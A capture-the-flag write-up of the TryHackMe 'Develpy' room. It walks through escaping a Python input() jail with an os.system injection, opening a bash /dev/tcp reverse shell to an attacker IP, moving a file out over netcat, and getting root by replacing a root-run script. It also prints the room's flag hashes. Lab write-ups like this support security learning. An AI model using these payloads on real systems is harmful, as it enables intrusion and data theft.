TryHackMe Writeup - Develpy Room

Title	https://tryhackme.com/room/bsidesgtdevelpy
Description	boot2root machine for FIT and bsides Guatemala CTF
Difficulty	Medium
Maker	https://tryhackme.com/p/stuxnet

Nmap

1
2
3
4
5
6
7
8


└─$ nmap 10.10.224.39
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-23 18:52 EST
Nmap scan report for 10.10.224.39
Host is up (0.096s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT      STATE SERVICE
22/tcp    open  ssh
10000/tcp open  snet-sensor-mgmt

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36


└─$ nmap -n -sV --script "ndmp-fs-info" -p 10000 10.10.224.39
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-23 18:55 EST
Stats: 0:01:45 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 0.00% done
Stats: 0:01:51 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 0.00% done
Nmap scan report for 10.10.224.39
Host is up (0.093s latency).

PORT      STATE SERVICE           VERSION
10000/tcp open  snet-sensor-mgmt?
| fingerprint-strings:
|   GenericLines:
|     Private 0days
|     Please enther number of exploits to send??: Traceback (most recent call last):
|     File "./exploit.py", line 6, in <module>
|     num_exploits = int(input(' Please enther number of exploits to send??: '))
|     File "<string>", line 0
|     SyntaxError: unexpected EOF while parsing
|   GetRequest:
|     Private 0days
|     Please enther number of exploits to send??: Traceback (most recent call last):
|     File "./exploit.py", line 6, in <module>
|     num_exploits = int(input(' Please enther number of exploits to send??: '))
|     File "<string>", line 1, in <module>
|     NameError: name 'GET' is not defined
|   HTTPOptions, RTSPRequest:
|     Private 0days
|     Please enther number of exploits to send??: Traceback (most recent call last):
|     File "./exploit.py", line 6, in <module>
|     num_exploits = int(input(' Please enther number of exploits to send??: '))
|     File "<string>", line 1, in <module>
|     NameError: name 'OPTIONS' is not defined
|   NULL:
|     Private 0days
|_    Please enther number of exploits to send??:

So python service is running at port 10000 we can connect using nc.

1
2
3
4
5
6
7
8


└─$ nc 10.10.224.39 10000

        Private 0days

 Please enther number of exploits to send??: 1

Exploit started, attacking target (tryhackme.com)...
Exploiting tryhackme internal network: beacons_seq=1 ttl=1337 time=0.064 ms

Maybe a pyjail? I don’t know, let’s try!

user flag

Bypass Python sandboxes

Voila, it worked!

1
2
3
4
5
6
7
8


└─$ nc 10.10.224.39 10000

        Private 0days

 Please enther number of exploits to send??: __builtins__.__import__("os").system("ls")
credentials.png  exploit.py  root.sh  run.sh  user.txt

Exploit started, attacking target (tryhackme.com)...

1
2
3
4
5
6
7
8


─$ nc 10.10.224.39 10000

        Private 0days

 Please enther number of exploits to send??: __builtins__.__import__("os").system("cat user.txt")
cf85ff769cfaaa721758949bf870b019

Exploit started, attacking target (tryhackme.com)...

Connecting with rev bash shell,

root flag

use this to get the rev shell - **builtins**.**import**("os").system("bash -c 'bash -i >& /dev/tcp/10.8.95.227/4444 0>&1'")

We will get the shell as king user.

There is a file named as credentials.png , now we have to download using nc.

1
2
3
4
5


On your machine
nc -l -p 1234 -q 1 > credentials.png < /dev/null

On King's machine
cat credentials.png | netcat 10.8.95.227 1234

well, it does not seem like png file. I cannot be able to crack it. (Yes yes, later I have checked writeup for it!) — it was piet programming (https://www.bertnase.de/npiet/). Anyway…

Here, we can able to read file and delete it.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19


king@ubuntu:~$ ls -al
ls -al
total 324
drwxr-xr-x 4 king king   4096 Aug 27  2019 .
drwxr-xr-x 3 root root   4096 Aug 25  2019 ..
-rw------- 1 root root   2929 Aug 27  2019 .bash_history
-rw-r--r-- 1 king king    220 Aug 25  2019 .bash_logout
-rw-r--r-- 1 king king   3771 Aug 25  2019 .bashrc
drwx------ 2 king king   4096 Aug 25  2019 .cache
-rwxrwxrwx 1 king king 272113 Aug 27  2019 credentials.png
-rwxrwxrwx 1 king king    408 Aug 25  2019 exploit.py
drwxrwxr-x 2 king king   4096 Aug 25  2019 .nano
-rw-rw-r-- 1 king king      5 Feb 23 17:12 .pid
-rw-r--r-- 1 king king    655 Aug 25  2019 .profile
-rw-r--r-- 1 root root     32 Aug 25  2019 root.sh
-rw-rw-r-- 1 king king    139 Aug 25  2019 run.sh
-rw-r--r-- 1 king king      0 Aug 25  2019 .sudo_as_admin_successful
-rw-rw-r-- 1 king king     33 Aug 27  2019 user.txt
-rw-r--r-- 1 root root    183 Aug 25  2019 .wget-hsts

Next thing is remove the [root.sh](http://root.sh) file and then create a new file and add reverse shell in that file.

Untitled

And boom we for the root!

1
2
3
4


root@ubuntu:/home/king# cat /root/root.txt
cat /root/root.txt
9c37646777a53910a347f387dce025ec
root@ubuntu:/home/king#